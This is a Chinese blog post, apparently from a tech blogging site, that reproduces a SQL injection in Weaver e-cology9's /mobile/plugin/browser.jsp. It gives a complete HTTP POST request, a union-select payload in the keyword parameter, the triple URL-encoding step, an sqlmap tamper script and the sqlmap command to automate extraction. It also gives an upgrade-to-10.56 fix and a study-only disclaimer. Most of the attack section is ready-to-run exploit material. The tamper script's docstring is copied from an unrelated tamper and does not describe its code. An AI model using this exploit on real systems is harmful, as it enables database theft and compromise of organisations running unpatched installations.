泛微e-cology9 browser.jsp SQL注入漏洞

本文介绍了泛微e-cology9的browser.jsp存在的SQL注入漏洞,详细阐述了漏洞的成因、危害及复现步骤,包括如何构建数据包、使用sqlmap自动化注入。同时,提出了修复建议,即升级到10.56及以上版本,并提供了相关扩展知识链接。

泛微e-cology9 browser.jsp SQL注入漏洞

漏洞描述(介绍、成因)

泛微e-cology9中存在SQL注入漏洞,经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。

漏洞危害

恶意攻击者可能会利用SQL注入漏洞获取、篡改数据库数据,执行系统命令,甚至获取系统控制权限。

适用场景

泛微e-cology9 <= 10.55

漏洞复现过程(有条件的自行搭建环境)

1、构建数据包
POST /mobile/plugin/browser.jsp HTTP/1.1
Host: xxx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-N976N Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36 E-Mobile7/7.0.41.20201208 Language/zh Qiyuesuo/physicalSDK
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: xxx
Connection: close
Content-Length: 574

isDis=1&browserTypeId=269&keyword=a%' union select 1,'
2、对payload进行三次url编码

payload:[isDis=1&browserTypeId=269&keyword=a%’ union select 1,']

在这里插入图片描述

3、发送恶意数据包,尝试注入

在这里插入图片描述
payload:[isDis=1&browserTypeId=269&keyword=a%’ union select 1,(select ‘hello’)']

在这里插入图片描述

4、使用sqlmap进行自动化注入

keyword 处内容换成星号 *

在这里插入图片描述

编写tamper脚本,对payload进行三次编码

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def encodeAllStrings(strings):
    return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in strings)

def tamper(payload, **kwargs):
    """
    Replaces instances of <int> UNION with <int>e0UNION

    Requirement:
        * MySQL
        * MsSQL

    Notes:
        * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

    >>> tamper('1 UNION ALL SELECT')
    '1e0UNION ALL SELECT'
    """
    if payload:
        payload = encodeAllStrings(encodeAllStrings(encodeAllStrings(payload)))


    return payload

sqlmap.py -r target.txt --level 5 --tamper=url3encode

在这里插入图片描述
在这里插入图片描述

修复建议

目前官方已发布安全补丁,建议受影响用户尽快升级至10.56及以上版本。

https://www.weaver.com.cn/cs/securityDownload.asp#

扩展知识(链接、文章)

参考链接

泛微e-cology9 browser.jsp SQL注入漏洞分析 (qq.com)

注:本文章仅作技术学习作用,一切实验皆在个人虚拟环境下进行!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值